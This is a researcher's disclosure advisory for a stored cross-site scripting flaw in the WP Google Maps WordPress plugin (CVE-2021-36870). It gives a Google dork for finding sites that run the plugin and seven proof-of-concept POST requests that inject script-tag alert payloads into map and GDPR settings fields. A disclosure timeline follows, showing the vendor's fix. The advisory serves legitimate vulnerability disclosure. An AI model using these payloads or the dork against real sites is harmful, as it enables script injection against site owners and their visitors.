[+] :: VULNERABILITY: WP Google Maps Plugin < 8.1.13 - Authenticated Persistent XSS [+] :: GOOGLE DORK: inurl:/wp-content/plugins/wp-google-maps/ [+] :: DATE: 2021-06-04 [+] :: SECURITY RESEARCHER: Visse [ https://visse.ru ] [+] :: VENDOR: WP Google Maps [ https://www.wpgmaps.com ] [+] :: SOFTWARE VERSION: < 8.1.13 [+] :: SOFTWARE LINK: https://wordpress.org/plugins/wp-google-maps/ [+] :: CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N [+] :: CWE: CWE-79 [+] :: CVE: CVE-2021-36870 [i] == [ Info: ] An Authenticated Persistent XSS vulnerability was discovered in the WP Google Maps plugin through v8.1.13 for WordPress. Vulnerable parameter(s): &address, &polyname (x2), &name (x2), &wpgmza_gdpr_company_name, &wpgmza_gdpr_retention_purpose. [?] == [ Code: ] - [$] == [ Impact: ] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. [%] == [ Payloads: ] <script>alert(origin)</script> <script>alert(document.domain)</script> [!] == [ PoC #1 | Authenticated Persistent XSS | Maps > Markers > &address: ] POST /wp-json/wpgmza/v1/markers/ HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Wp-Nonce: 8b3dbb283b X-Wpgmza-Action-Nonce: e7db87e0a9 X-Requested-With: XMLHttpRequest Content-Length: 125 id=-1&map_id=1&address=%3Cscript%3Ealert(origin)%3C%2Fscript%3E&lat=39.953798&lng=-75.17193&anim=0&infoopen=0&approved=1 [!] == [ PoC #2 | Authenticated Persistent XSS | Maps > Polygons > &polyname: ] POST /wp-json/wpgmza/v1/polygons/ HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Wp-Nonce: 8b3dbb283b X-Wpgmza-Action-Nonce: e722c293b0 X-Requested-With: XMLHttpRequest Content-Length: 378 id=-1&map_id=1&polyname=%3Cscript%3Ealert(%2FVisse%2F)%3C%2Fscript%3E&title=&description=&link=&linecolor=%23666666&lineopacity=0.5&fillcolor=%23cc0000&opacity=0.5&ohlinecolor=%23333333&ohfillcolor=%23ff0000&ohopacity=0.7&polydata=%5B%7B%22lat%22%3A36.77828315944244%2C%22lng%22%3A-119.41792718131755%7D%2C%7B%22lat%22%3A36.77826892670358%2C%22lng%22%3A-119.41787688989852%7D%5D [!] == [ PoC #3 | Authenticated Persistent XSS | Maps > Polylines > &polyname: ] POST /wp-json/wpgmza/v1/polylines/ HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Wp-Nonce: 8b3dbb283b X-Wpgmza-Action-Nonce: e722c293b0 X-Requested-With: XMLHttpRequest Content-Length: 274 id=-1&map_id=1&polyname=%3Cscript%3Ealert(%2FVisse%2F)%3C%2Fscript%3E&linecolor=%23000000&opacity=0.5&linethickness=4&polydata=%5B%7B%22lat%22%3A36.778279399851286%2C%22lng%22%3A-119.4179590325496%7D%2C%7B%22lat%22%3A36.77827134358396%2C%22lng%22%3A-119.41787018437599%7D%5D [!] == [ PoC #4 | Authenticated Persistent XSS | Maps > Circles > &name: ] POST /wp-json/wpgmza/v1/circles/ HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Wp-Nonce: 8b3dbb283b X-Wpgmza-Action-Nonce: e722c293b0 X-Requested-With: XMLHttpRequest Content-Length: 171 id=-1&map_id=1&center=36.778281548189106%2C+-119.41786884327148&name=%3Cscript%3Ealert(%2FVisse%2F)%3C%2Fscript%3E&radius=0.0027967709419604793&color=%23000000&opacity=0.5 [!] == [ PoC #5 | Authenticated Persistent XSS | Maps > Rectangles > &name: ] POST /wp-json/wpgmza/v1/rectangles/ HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Wp-Nonce: 8b3dbb283b X-Wpgmza-Action-Nonce: e722c293b0 X-Requested-With: XMLHttpRequest Content-Length: 191 id=-1&map_id=1&cornerA=36.7782930621891%2C+-119.41787860787272&cornerB=36.778272115895994%2C+-119.41782898700595&name=%3Cscript%3Ealert(%2FVisse%2F)%3C%2Fscript%3E&color=%23000000&opacity=0.5 [!] == [ PoC #6 | Authenticated Persistent XSS | Settings > GDPR Compliance > Company Name > &wpgmza_gdpr_company_name: ] POST /wp-admin/admin-post.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 1989 nonce=f3223b635d&action=wpgmza_save_settings&wpgmza_maps_engine=google-maps&user_interface_style=minimal&wpgmza_settings_cat_logic=0&wpgmza_settings_filterbycat_type=1&use_fontawesome=4.*&tile_server_url=&tile_server_url_override=&wpgmza_load_engine_api_condition=where-required&wpgmza_always_include_engine_api_on_pages=&wpgmza_always_exclude_engine_api_on_pages=&wpgmza_settings_access_level=manage_options&wpgmza_settings_retina_width=13&wpgmza_settings_retina_height=13&wpgmza_settings_image_width=&wpgmza_settings_image_height=&wpgmza_settings_infowindow_width=&wpgmza_settings_infowindow_link_text=&wpgmza_settings_map_open_marker_by=1&wpgmza_store_locator_radii=&wpgmza_google_maps_api_key=&open_layers_api_key=&wpgmza_settings_marker_pull=0&wpgmza_marker_xml_location=&wpgmza_marker_xml_url=&wpgmza_custom_css=&wpgmza_custom_js=&wpgmza_gdpr_require_consent_before_load=on&wpgmza_gdpr_company_name=%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E&wpgmza_gdpr_retention_purpose=displaying+map+tiles%2C+geocoding+addresses+and+calculating+and+display+directions.&wpgmza_gdpr_override_notice=on&wpgmza_gdpr_notice_override_text= [!] == [ PoC #7 | Authenticated Persistent XSS | Settings > GDPR Compliance > Retention Purpose(s) > &wpgmza_gdpr_retention_purpose: ] POST /wp-admin/admin-post.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 1989 nonce=f3223b635d&action=wpgmza_save_settings&wpgmza_maps_engine=google-maps&user_interface_style=minimal&wpgmza_settings_cat_logic=0&wpgmza_settings_filterbycat_type=1&use_fontawesome=4.*&tile_server_url=&tile_server_url_override=&wpgmza_load_engine_api_condition=where-required&wpgmza_always_include_engine_api_on_pages=&wpgmza_always_exclude_engine_api_on_pages=&wpgmza_settings_access_level=manage_options&wpgmza_settings_retina_width=13&wpgmza_settings_retina_height=13&wpgmza_settings_image_width=&wpgmza_settings_image_height=&wpgmza_settings_infowindow_width=&wpgmza_settings_infowindow_link_text=&wpgmza_settings_map_open_marker_by=1&wpgmza_store_locator_radii=&wpgmza_google_maps_api_key=&open_layers_api_key=&wpgmza_settings_marker_pull=0&wpgmza_marker_xml_location=&wpgmza_marker_xml_url=&wpgmza_custom_css=&wpgmza_custom_js=&wpgmza_gdpr_require_consent_before_load=on&wpgmza_gdpr_company_name=PoC&wpgmza_gdpr_retention_purpose=displaying+map+tiles%2C+geocoding+addresses+and+calculating+and+display+directions.%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&wpgmza_gdpr_override_notice=on&wpgmza_gdpr_notice_override_text= [*] == [ Timeline: ] 2021.06.03 - WP Google Maps Plugin v8.1.12 released 2021.06.04 - Multiple XSS issues discovered 2021.06.09 - Vendor contacted 2021.06.15 - WP Google Maps Plugin v8.1.13 released [@] == [ Contacts: ] Website: visse.ru LinkedIn: @visse Medium: @visse HackerOne: @visse ==================================================================== = Want money for vulnerabilities in the WordPress ecosystem? [Y/n] = = ---------------------------------------------------------------- = = [ Yes: ] Join the $ hunt here - https://patchstack.com/red-team/ = = [ No: ] Hunter, think twice and don't miss the chance to gain $ = ====================================================================